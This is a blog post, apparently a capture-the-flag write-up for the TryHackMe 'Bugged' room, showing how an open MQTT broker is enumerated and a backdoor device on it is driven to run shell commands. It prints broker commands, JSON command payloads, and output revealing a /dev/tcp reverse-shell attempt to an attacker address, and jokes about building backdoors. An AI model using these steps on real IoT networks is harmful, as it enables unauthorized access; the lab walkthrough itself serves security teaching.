{"id":404,"date":"2023-03-03T21:44:53","date_gmt":"2023-03-03T20:44:53","guid":{"rendered":"https:\/\/babdcatha.net\/?p=404"},"modified":"2023-03-04T14:48:05","modified_gmt":"2023-03-04T13:48:05","slug":"tryhackme-bugged","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/03\/03\/tryhackme-bugged\/","title":{"rendered":"TryHackMe : Bugged"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hey ! A new room was released on TryHackMe.com : <a href=\"https:\/\/tryhackme.com\/room\/bugged\">Bugged<\/a>. The description talks about weird traffic on a network and home appliances. We&#8217;re going to try to complete this room by finding the flag hidden somewhere.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">As usual, we start with an nmap scan searching for open ports and services :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap.png\" alt=\"\" class=\"wp-image-410\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we find a single service running on port 1883 : <a href=\"https:\/\/mosquitto.org\/\">mosquitto<\/a>. This software is an MQTT message broker. The <a href=\"https:\/\/en.wikipedia.org\/wiki\/MQTT\">MQTT Protocol<\/a> is usually used by connected objects that only need to send and receive data infrequently. In this protocol, there are two different entity types.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Clients : they are the devices on the network which need to communicate with each other. 
For example, a smart thermometer in a room, or an oven that you can remotely turn on and off. Clients do not exchange messages directly with each other.<\/li>\n\n\n\n<li>Brokers : they are the devices on the network that centralize these communications. When a device has a message to send, it sends it to a broker, and the broker forwards it to the clients that need it.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">To filter messages, every message carries a topic. Usually, these topics are strings whose levels are separated by forward slashes. For example, the garage temperature sensor could publish messages with the topic <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">home\/garage\/temperature<\/mark>. When a client wants to receive certain messages, it has to subscribe to the corresponding topics with the broker. When the broker receives a message on a matching topic, it forwards it to every subscribed client. Here is a drawing explaining that :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"1280\" height=\"720\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/MQTT.svg\" alt=\"\" class=\"wp-image-414\" style=\"border-style:none;border-width:0px;border-radius:35px\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Now that we have a basic understanding of what is happening on the network, we can try to find a way to see what is transiting on it. 
To do that, we will use the <a href=\"https:\/\/mosquitto.org\/man\/mosquitto_sub-1.html\">mosquitto_sub<\/a> client, which can be installed using :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">apt install mosquitto mosquitto-clients<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can contact the broker and subscribe to every topic to see what the clients are sending on the network. The <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">-t<\/mark> option indicates the topic we want to subscribe to. In this case, we are using the multi-level wildcard # to subscribe to everything, so that we can monitor all the traffic going through the broker, and -v prints the topic next to each message.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">mosquitto_sub -h $BROKER_IP -t \"#\" -v<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This is what we get :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"523\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening.png\" alt=\"\" class=\"wp-image-432\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/listening-768x418.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can see a bunch of IoT devices sending messages about their status and measurements, but one of the devices looks a bit weird : <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">yR3gPp0r8Y\/AGlaMxmHJe\/qV66JF5qmH\/config<\/mark>, and it seems to send base64-encoded JSON. 
Let&#8217;s try to decode it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"523\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded.png\" alt=\"\" class=\"wp-image-433\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/decoded-768x418.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Interesting, it looks like this unknown device can be interacted with, and we now know which topic it is subscribed to. Let&#8217;s try to send it a command to see how it responds :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">mosquitto_pub -h $BROKER_IP -t XD2rfR9Bez\/GqMpRSEobh\/TvLQehMg0E\/sub -m '{\"HELP\"}'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And we see a response :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response.png\" alt=\"\" class=\"wp-image-436\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we decode it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded.png\" alt=\"\" class=\"wp-image-437\" 
srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/response_decoded-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hmm, it looks like this device is a backdoor into the network, and we now know what kind of messages it expects. We can now try to play more with it. Using the ID we got from the first message, we can send this command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"cmd\": \"HELP\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, we get a more complete answer :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help.png\" alt=\"\" class=\"wp-image-439\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Which, once decoded, gives us :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"577\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded.png\" alt=\"\" class=\"wp-image-440\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded-300x180.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/help_decoded-768x462.png 768w\" sizes=\"auto, 
(max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">When we run the SYS command, we learn that the system is running a generic 64-bit Linux distribution. We can now run shell commands on the system. Let&#8217;s try a simple <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Reverse%20Shell%20Cheatsheet.md#bash-tcp\">bash reverse shell<\/a> :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\": \"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\", \"cmd\": \"CMD\", \"arg\": \"$REVERSE_SHELL_COMMAND\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This is what we get in return :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\":\"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\",\"response\":\"\/bin\/sh: 1: cannot create \/dev\/tcp\/10.11.10.96\/4242: Directory nonexistent\\n\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The error comes from \/bin\/sh : the \/dev\/tcp pseudo-device is a bash feature, and the shell that executes our command does not provide it. It also looks like netcat is not present on the system. 
Maybe we are trying to go too fast here. If we simply run ls, this is the answer we get :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"json\" class=\"language-json\">{\"id\":\"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d\",\"response\":\"flag.txt\\n\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It was there all along. Now we can cat it and we get our flag !<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur.png\" alt=\"\" class=\"wp-image-444\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/flag_blur-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We got our flag, and this room is now complete ! I hope you learned a thing or two about MQTT and IoT security, maybe a new idea to create a backdoor if you ever need to. It also personally reminded me that sometimes the simplest things should be tried first. 
See you next time !<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n<p class=\"wp-block-paragraph\">Image credits :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/server\">Server icons created by Freepik &#8211; Flaticon<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/humidity-sensor\">Humidity sensor icons created by Maan Icons &#8211; Flaticon<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.flaticon.com\/free-icons\/temperature\">Temperature icons created by Freepik &#8211; Flaticon<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Hey ! A new room was released on TryHackMe.com : Bugged. 
The description talks about weird traffic on a network and home appliances. We&#8217;re going to try to complete this room by finding the flag hidden somewhere. As usual, we start with an nmap scan searching for open ports and services : Here, we find [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[36,37,35,8],"class_list":["post-404","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-iot","tag-mosquitto","tag-mqtt","tag-tryhackme"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":35,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"predecessor-version":[{"id":456,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/404\/revisions\/456"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}